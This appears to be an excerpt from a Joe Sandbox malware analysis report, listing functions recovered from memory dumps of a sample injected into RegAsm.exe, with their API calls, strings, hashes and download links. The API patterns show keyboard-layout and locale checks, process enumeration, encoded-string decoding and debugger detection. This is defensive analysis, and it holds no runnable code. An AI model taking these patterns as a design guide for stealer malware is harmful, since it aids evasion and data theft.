Opcode Fuzzy Hash: 77e3198e6f7e4fed7d99e4de022067f2d20b89a3626f5b9df4e586ea4224d035
Instruction Fuzzy Hash: 25C149B6E593424FEB009A18DC82BDB77D1EF92315F9C052EF485873A3E225E585C782

Function 00410ACD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410AD2

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

GetKeyboardLayoutList.USER32(00000000,00000000,00427307,00000001,?,00000000), ref: 00410B04
LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 00410B12
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 00410B1D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 00410B47

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

LocalFree.KERNEL32(?), ref: 00410BEB

Strings

/ , xrefs: 00410B55

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 2868853201-4001269591
Opcode ID: cb95bf2d00b02f6fa2e10ba2c9c21ff4ddfd16a58d507e3c7a07e4742ec5a4a1
Instruction ID: fd254bab53c17c7027ff5cf79a006a85c0399be6dbd245cf34b44f703b6fb313
Opcode Fuzzy Hash: cb95bf2d00b02f6fa2e10ba2c9c21ff4ddfd16a58d507e3c7a07e4742ec5a4a1
Instruction Fuzzy Hash: B4313E71901119AFDB14EFE5C889AEEB7B9FF09344F10405EF615A7141C7785AC4CBA4

Function 1B6B7810 Relevance: 10.9, APIs: 7, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db773b0ae705fc7df72fb0d7e8afe25b70c1965c09083eaff676e2a3f3cd3ee8
Instruction ID: 012bbd59a88cba75012365d78b089e0c90236291521442daa34d990048222b68
Opcode Fuzzy Hash: db773b0ae705fc7df72fb0d7e8afe25b70c1965c09083eaff676e2a3f3cd3ee8
Instruction Fuzzy Hash: D0E123B1A053029FC701DF35D981ABBB7F4BF65640F084A5DF885AB251E738E854CBA2

Function 1B7251D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

, xrefs: 1B725334
REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B725264

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-69911113
Opcode ID: 18b7786aa9976fbd9380cd54106b80bd48212e22ce6365ce5c9d745566350540
Instruction ID: c775fae2b0c09d06cabb9f7c47c538ff66f4baa049164dd05a1f18be11431441
Opcode Fuzzy Hash: 18b7786aa9976fbd9380cd54106b80bd48212e22ce6365ce5c9d745566350540
Instruction Fuzzy Hash: 3A419EB5900301AFDB00DF29DC80B9AB7E5FF88308F450569F989E7251E771E950CB92

Function 1B75D610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction ID: 13677d3370b5a79a2d671471c4d7db52a746e73577f04e4305b20dfedeb68691
Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction Fuzzy Hash: 0D41C1B5500742ABDB009F25DC81E9BB7E8FF45351F004A2CF85986260E772E916CBA6

Function 1B695C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: 0541e503406bf87e95db1c143ce62e0ddd6f03844758f4eb8943594403123a92
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: 4641DEB5605301DFDB14DF18E884AA6B7E4FFA8320F10446DE9918B691E762F9548B60

Function 1B719090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a606322fb3e48be00025eb310d2f350fa0c3c0e84438e9cc3f1834479693f0cf
Instruction ID: acfb3e16d93dbacc22630d23315986e57309b2c3294c35c43dcc0d593d646431
Opcode Fuzzy Hash: a606322fb3e48be00025eb310d2f350fa0c3c0e84438e9cc3f1834479693f0cf
Instruction Fuzzy Hash: 3131D175600201DFDB50CF29D885AAAB3F4FF84325B1445B9E9428F262D732FC92DBA0

Function 00408E1E Relevance: 9.1, APIs: 6, Instructions: 83stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408E45
lstrlenA.KERNEL32(?,00000001,?,00409236,00000000,00000000,00000000,?,00409236,00000014,?,?,?,?,?), ref: 00408E5F
CryptStringToBinaryA.CRYPT32(?,00000000,?,00409236,00000014), ref: 00408E69
memcpy.MSVCRT ref: 00408ED1
lstrcat.KERNEL32(00426C33,00426C37), ref: 00408EF8
lstrcat.KERNEL32(00426C33,00426C3A), ref: 00408F10

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 6ee5ec2687958f12fb782d22c65e92939e7cfbc03c4982da4d0e26e94fb7d57e
Instruction ID: 9f00ca1e45452c464c5f39282d346b9be538d73cb207fa6405665cf7f1909882
Opcode Fuzzy Hash: 6ee5ec2687958f12fb782d22c65e92939e7cfbc03c4982da4d0e26e94fb7d57e
Instruction Fuzzy Hash: A2218D7190011EEFDB109F98DE849EEBBBDEF04344F10047AF505F2241DB388A559BA9

Function 00411FA6 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411FAB
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FD1
Process32First.KERNEL32(00000000,00000128), ref: 00411FE1
Process32Next.KERNEL32(00000000,00000128), ref: 00411FF3
StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 00412007
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041201A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
String ID:
API String ID: 186290926-0
Opcode ID: 75b53a094b964750c471d917b4155db685f8e40c81acb4742c048d445ed2e5c1
Instruction ID: 6701b773630fbe07c067c797b8fb54358af9575d8ffcb44293aa9581e714d063
Opcode Fuzzy Hash: 75b53a094b964750c471d917b4155db685f8e40c81acb4742c048d445ed2e5c1
Instruction Fuzzy Hash: 60015A76900018EBCB219F55DD88AEEBBBAEB8A704F104156F601E2210D7788F81CBA5

Function 1B701FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B702001

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: b5a679f610ff1563acda1b074d3e322d6abe80ccc5cdba6b984f8d5881fc8b87
Instruction ID: 557f19771c8756719dfb1868847c51112440e651a1578552e3745ce6793cf74c
Opcode Fuzzy Hash: b5a679f610ff1563acda1b074d3e322d6abe80ccc5cdba6b984f8d5881fc8b87
Instruction Fuzzy Hash: 6D210FB6900305AFDB10AF68DC81FEAB7E9EF15354F00441AF88497161DB72F860CBA5

Function 00406D7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2

Strings

6d@, xrefs: 00406D89, 00406D90, 00406DA9, 00406DBB

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: 6d@
API String ID: 4291131564-2833952515
Opcode ID: 07297a27885fa965d9244d245d68dc03ea419e93441c2a657603b00e5f5aabee
Instruction ID: 21c8bbf66b44fac42f13d591f7c59cf5373e0e3b4a49451457007209dfea37cc
Opcode Fuzzy Hash: 07297a27885fa965d9244d245d68dc03ea419e93441c2a657603b00e5f5aabee
Instruction Fuzzy Hash: 8501E874201234BBCB215F56DD88ECB7FADEF4BBA1B104051FA0AAA250D2718950CAA0

Function 0041BDF7 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041EBAA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041EBBF
UnhandledExceptionFilter.KERNEL32(00429FF8), ref: 0041EBCA
GetCurrentProcess.KERNEL32(C0000409), ref: 0041EBE6
TerminateProcess.KERNEL32(00000000), ref: 0041EBED

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 76df515215b4c90f54eac16ec56451da8a2b7c343eff6ec2bb25d7cede8acdc2
Instruction ID: 658e8adcc30e322284bda1868443fb43cff255b4b84b9b41d2f830270a927445
Opcode Fuzzy Hash: 76df515215b4c90f54eac16ec56451da8a2b7c343eff6ec2bb25d7cede8acdc2
Instruction Fuzzy Hash: 06212FBCA11300DFC710DF69F9466943BB2FB0B391F80202AE4088B660E7B45AC6CF19

Function 1B6B1C50 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

RtreeMatchArg, xrefs: 1B6B1F83

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: RtreeMatchArg
API String ID: 0-1459067757
Opcode ID: 4b456da11811e32fa6b00bd492d59a2108c110acd52b8b20cf6e1d609a5dd434
Instruction ID: fd7191f840dcf162b4417234448c9d907307f064e0e2d4e680430dbd895276b2
Opcode Fuzzy Hash: 4b456da11811e32fa6b00bd492d59a2108c110acd52b8b20cf6e1d609a5dd434
Instruction Fuzzy Hash: 4302EEF4A047429FCB10CF25C980A9BBBF4BF69744F00461DF9899B211E734E995CBA2

Function 1B68298C Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 1B872A1F
IsValidCodePage.KERNEL32(00000000), ref: 1B872A56
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 1B872C3A

Strings

utf8, xrefs: 1B872B28

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID: CodeInfoLocalePageValid
String ID: utf8
API String ID: 790303815-905460609
Opcode ID: a0cd88d8b75b8d54c4b2ec5133385148cda290bab9a8f14bbbd7c69b966651a8
Instruction ID: 9bf4789f18ae5bba1616448babb8732f1d71de9f685981bba86769908b9a09c7
Opcode Fuzzy Hash: a0cd88d8b75b8d54c4b2ec5133385148cda290bab9a8f14bbbd7c69b966651a8
Instruction Fuzzy Hash: 277137B5A00306AADB15BF39CC86FEA73A8EF46F18F100029E955DB180FB70E544C7A5

Function 0040245C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00402481
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1

Strings

UNK, xrefs: 004024D0

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptString$memset
String ID: UNK
API String ID: 1505698593-448974810
Opcode ID: 915aa56b6389106d2bf27ea960dc53b772d9e7e11c29ce0488f590be3bba50fc
Instruction ID: 5b765708ded4d56476039759f4491a960e55f65d545ba668e33edd2c8b476d63
Opcode Fuzzy Hash: 915aa56b6389106d2bf27ea960dc53b772d9e7e11c29ce0488f590be3bba50fc
Instruction Fuzzy Hash: E8014FB260015CBEE711EB99DD81DFFB7ACEB44658F0000ABF704E2181D6B8AE454A79

Function 00411B94 Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411BB8
